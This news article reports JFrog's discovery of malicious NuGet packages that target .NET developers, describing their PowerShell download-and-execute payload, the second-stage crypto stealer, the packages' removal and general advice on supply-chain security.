Threat Actors Target .NET Developers with Malicious NuGet Packages
Recent reports have revealed that threat actors have started using the open source package manager NuGet to create malicious packages that target .NET developers. This discovery marks the first instance of malicious code found in NuGet packages in the wild, as stated by software package management company JFrog.
Shachar Menashe, senior director at JFrog Security Research, highlighted the significance of this discovery, stating, “For the first time, the NuGet repository – once thought to be untouched by malicious code – actually contains several harmful software packages designed to run automatically and often connected to further infected dependencies. This proves that no open source repository is safe from malicious actors.”
According to a recent advisory by JFrog security researchers Natan Nehorai and Brian Moussalli, these malicious packages have been downloaded over 150,000 times in the past month. The packages were found to contain a ‘download & execute’ type of payload, specifically a PowerShell script that triggers the download of a more sophisticated second-stage payload for remote execution.
The second-stage payload includes various capabilities such as a crypto stealer, an Electron archive extractor that supports code execution, and an auto-updater. Upon alerting NuGet administrators, the malicious packages were promptly removed from the repository.
Despite the removal of these malicious packages, .NET developers using NuGet are still at risk of encountering malicious code. The observed packages could still execute code upon installation, posing a threat to developers’ environments. Menashe emphasized the importance of caution when selecting open-source components for software builds to maintain a secure software supply chain.
Securing Open Source Software
For guidance on securing open source software, OpenUK CEO Amanda Brock has provided valuable insights in an analysis. It is essential for .NET developers and other users of open-source repositories to remain vigilant and prioritize security measures throughout the software development lifecycle.
As the threat landscape continues to evolve, staying informed about potential risks and implementing robust security practices is crucial for safeguarding software projects and protecting sensitive data.